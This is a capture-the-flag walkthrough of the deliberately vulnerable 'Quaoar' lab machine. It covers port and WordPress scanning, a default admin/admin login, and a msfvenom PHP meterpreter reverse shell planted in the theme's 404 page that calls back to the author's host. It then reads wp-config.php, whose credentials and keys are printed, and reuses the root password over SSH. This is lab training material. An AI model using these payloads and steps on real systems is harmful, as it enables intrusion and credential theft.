Quaoar
With the information from the maker there are 3 flags to capture. "1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box.” The difficulty of this machine is set to easy. Let’s have a go at it.
First this to do is to enumerate. Let’s bring up nmap and scan this machine.
nmap -sS -T4 10.198.117.225 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-04-11 09:40 PDT Nmap scan report for 10.198.117.225 Host is up (0.00055s latency). Not shown: 991 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s MAC Address: F4:0F:24:22:70:03 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 10.19 seconds
We can see that good ‘ole Port 80 is open and that Port 22 is open. We see many others like pop3, but we’ll use the easiest ones first. Going to the hosted site we see a image of a planet (or a moon, which ever you deem fit).
The source page for the website shows no clues, so let’s click the image and we are taken into another image:
Again viewing the source of the page/image shows no other clues. So let’s go ahead and enumerate even further, back to our terminal shall we? Let’s use nikto to further investigate about the website:
nikto -h 10.198.117.225 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.198.117.225 + Target Hostname: 10.198.117.225 + Target Port: 80 + Start Time: 2017-04-11 09:40:54 (GMT-7) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Sun Oct 23 21:00:10 2016 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3 + Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3233: /icons/README: Apache default file found. + /wordpress/: A Wordpress installation was found. + 8348 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2017-04-11 09:41:08 (GMT-7) (14 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
What we can see is that this site is using Apache to host the website, but we also get hints to a Wordpress. We’ll try and enumerate this Wordpress using WPSCAN:
wpscan -u 10.198.117.225/wordpress --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: http://10.198.117.225/wordpress/ [+] Started: Tue Apr 11 09:42:43 2017 [!] The WordPress 'http://10.198.117.225/wordpress/readme.html' file exists exposing a version number [+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu) [+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3 [+] XML-RPC Interface available under: http://10.198.117.225/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://10.198.117.225/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://10.198.117.225/wordpress/wp-includes/ [+] WordPress version 3.9.14 identified from advanced fingerprinting (Released on 2016-09-07) [!] 8 vulnerabilities identified from the version number [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php Reference: https://wpvulndb.com/vulnerabilities/8716 Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488 [i] Fixed in: 3.9.15 [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback Reference: https://wpvulndb.com/vulnerabilities/8718 Reference: https://www.mehmetince.net/low-severity-wordpress/ Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490 [i] Fixed in: 3.9.15 [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default Reference: https://wpvulndb.com/vulnerabilities/8719 Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491 [i] Fixed in: 3.9.15 [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF) Reference: https://wpvulndb.com/vulnerabilities/8720 Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733 Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492 [i] Fixed in: 3.9.15 [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG) Reference: https://wpvulndb.com/vulnerabilities/8721 Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4 Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493 [i] Fixed in: 3.9.15 [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8730 Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/ Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611 [i] Fixed in: 3.9.16 [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata Reference: https://wpvulndb.com/vulnerabilities/8765 Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7 Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html Reference: http://seclists.org/oss-sec/2017/q1/563 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814 [i] Fixed in: 3.9.17 [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation Reference: https://wpvulndb.com/vulnerabilities/8766 Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/ Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815 [i] Fixed in: 3.9.17 [+] WordPress theme in use: twentyfourteen - v1.1 [+] Name: twentyfourteen - v1.1 | Location: http://10.198.117.225/wordpress/wp-content/themes/twentyfourteen/ [!] The version is out of date, the latest version is 1.9 | Style URL: http://10.198.117.225/wordpress/wp-content/themes/twentyfourteen/style.css | Referenced style.css: wp-content/themes/twentyfourteen/style.css | Theme Name: Twenty Fourteen | Theme URI: http://wordpress.org/themes/twentyfourteen | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des... | Author: the WordPress team | Author URI: http://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Enumerating usernames ... [+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | admin | admin | | 2 | wpuser | wpuser | +----+--------+--------+ [!] Default first WordPress username 'admin' is still used [+] Finished: Tue Apr 11 09:43:46 2017 [+] Requests Done: 55 [+] Memory used: 9.555 MB [+] Elapsed time: 00:01:03
We can see that the user enumeration option shows that the default admin user is present. So let’s go ahead and go to /wordpress.
Scrolling down we can see the login link:
User: admin Password: admin seem to work as we enter the dashboard for the Wordpress.
As I’ve demonstrated before on my other write-ups we can use a php shell to gain access. Let’s go into the appearances tab and edit the 404 page. But first we need to create our shell, and I’ll use msfvenom for that.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.95.6.200 LPORT=4444 -f raw > /root/Desktop/shell.php [*] exec: msfvenom -p php/meterpreter/reverse_tcp LHOST=10.95.6.200 LPORT=4444 -f raw > /root/Desktop/shell.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 947 bytes
I’ll be using a meterpreter session by reverse tcp in the php shell. The options for the LHOST and LPORT is my attack machine, the -f options is the output of the file. In this case I’ll be putting this on my desktop. Next I’m opening the file with a text file editor and copying this over into the Wordpress 404 editor.
Before we enter the 404 page let’s open up metasploit and make sure it’s listening to the ports. Using a simple handler as shown below:
msf exploit(handler) > set LHOST 10.95.6.200 LHOST => 10.95.6.200 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.95.6.200 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
Now we can enter the 404 page and pay attention to the metasploit listener.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.95.6.200:4444 [*] Starting the payload handler... [*] Sending stage (33721 bytes) to 10.198.117.225 [*] Meterpreter session 1 opened (10.95.6.200:4444 -> 10.198.117.225:47523) at 2017-04-11 09:56:03 -0700 meterpreter >
Sweet now let’s go ahead and explore!
meterpreter > ls Listing: /var/www/wordpress =========================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100644/rw-r--r-- 418 fil 2016-10-26 17:45:26 -0700 index.php 100644/rw-r--r-- 19930 fil 2016-10-26 17:45:26 -0700 license.txt 100644/rw-r--r-- 7195 fil 2016-10-26 17:45:26 -0700 readme.html 100644/rw-r--r-- 4896 fil 2016-10-26 17:45:26 -0700 wp-activate.php 40755/rwxr-xr-x 4096 dir 2016-10-26 17:45:26 -0700 wp-admin 100644/rw-r--r-- 271 fil 2016-10-26 17:45:26 -0700 wp-blog-header.php 100644/rw-r--r-- 4818 fil 2016-10-26 17:45:26 -0700 wp-comments-post.php 100644/rw-r--r-- 3087 fil 2016-10-26 17:45:26 -0700 wp-config-sample.php 100666/rw-rw-rw- 3441 fil 2016-11-29 21:02:01 -0800 wp-config.php 40755/rwxr-xr-x 4096 dir 2016-10-26 17:45:26 -0700 wp-content 100644/rw-r--r-- 2932 fil 2016-10-26 17:45:26 -0700 wp-cron.php 40755/rwxr-xr-x 4096 dir 2016-10-26 17:45:26 -0700 wp-includes 100644/rw-r--r-- 2380 fil 2016-10-26 17:45:26 -0700 wp-links-opml.php 100644/rw-r--r-- 2359 fil 2016-10-26 17:45:26 -0700 wp-load.php 100644/rw-r--r-- 33609 fil 2016-10-26 17:45:26 -0700 wp-login.php 100644/rw-r--r-- 8235 fil 2016-10-26 17:45:26 -0700 wp-mail.php 100644/rw-r--r-- 11070 fil 2016-10-26 17:45:26 -0700 wp-settings.php 100644/rw-r--r-- 25665 fil 2016-10-26 17:45:26 -0700 wp-signup.php 100644/rw-r--r-- 4026 fil 2016-10-26 17:45:26 -0700 wp-trackback.php 100644/rw-r--r-- 3032 fil 2016-10-26 17:45:26 -0700 xmlrpc.php
So I went to town exploring the depths of this server and now notice that it was in front of me the whole time. But I did find a flag in this directory:
meterpreter > cd home meterpreter > ls Listing: /home ============== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2016-10-22 09:53:38 -0700 wpadmin meterpreter > cat wpadmin [-] wpadmin is a directory meterpreter > cd wpadmin meterpreter > ls Listing: /home/wpadmin ====================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100644/rw-r--r-- 33 fil 2016-10-22 09:54:00 -0700 flag.txt meterpreter > cat flag.txt 2bafe61f03117ac66a73c3c514de796e
Sweet, but we need to find another flag. Because we still haven’t gotten root access. Remember what I said about it being in front of me the whole time? Well let’s go back to the beginning of the meterpreter session. In the first directory there is a wp-config.php file were usernames and passwords are stored. Let’s take a look!
meterpreter > cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/** */
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '`47hAs4ic+mLDn[-PH(7t+Q+J)L=8^ 8&z!F ?Tu4H#JlV7Ht4}Fsdbg2us1wZZc');
define('SECURE_AUTH_KEY', 'g#vFXk!k|3,w30.VByn8+D-}-P(]c1oI|&BfmQqq{)5w)B>$?5t}5u&s)#K1@{%d');
define('LOGGED_IN_KEY', '[|;!?pt}0$ei+>sS9x+B&$iV~N+3Cox-C5zT|,P-<0YsX6-RjNA[WTz-?@<F[O@T');
define('NONCE_KEY', '7RFLj2-NFkAjb6UsKvnN+1aj<Vm++P9<D~H+)l;|5?P1*?gi%o1&zKaXa<]Ft#++');
define('AUTH_SALT', 'PN9aE9`#7.uL|W8}pGsW$,:h=Af(3h52O!w#IWa|u4zfouV @J@Y_GoC8)ApSKeN');
define('SECURE_AUTH_SALT', 'wGh|W wNR-(p6fRjV?wb$=f4*KkMM<j0)H#Qz-tu.r~2O*Xs9W3^_`c6Md+ptRR.');
define('LOGGED_IN_SALT', '+36M1E5.MC;-k:[[_bs>~a0o_c$v?ok4LR|17 ]!K:Z8-]lcSs?EXC`TO;X3in[#');
define('NONCE_SALT', 'K=Sf5{EDu3rG&x=#em=R}:-m+IRNs<@4e8P*)GF#+x+,zu.D8Ksy?j+_]/Kcn|cn');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
* language support.
*/
define('WPLANG', '');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php’);
Excellent we have a root information!
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
So let’s try using this somewhere, but where exactly. Well the most obvious is a MySQL login, but that didn’t work. Let’s try using these in SSH.
ssh root@10.198.117.225 The authenticity of host '10.198.117.225 (10.198.117.225)' can't be established. ECDSA key fingerprint is SHA256:+ODdJgfptUyyVzKI9wDm804SlXxzmb4/BiKsHCnHGeg. Are you sure you want to continue connecting (yes/no)? y Please type 'yes' or 'no': yes Warning: Permanently added '10.198.117.225' (ECDSA) to the list of known hosts. root@10.198.117.225's password: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Mon Apr 10 21:19:10 EDT 2017 System load: 0.0 Processes: 98 Usage of /: 29.9% of 7.21GB Users logged in: 0 Memory usage: 37% IP address for eth0: 10.198.117.225 Swap usage: 0% IP address for virbr0: 192.168.122.1 Graph this data and manage this system at https://landscape.canonical.com/ New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com root@Quaoar:~#
Well what do ya know, it works! Let’s go ahead and find that last flag.
root@Quaoar:~# ls flag.txt vmware-tools-distrib root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb
Oh well there you go, pretty simple really.
This machine is definitely geared toward beginners, it does make you think a bit, but it is worth the time to find the flags.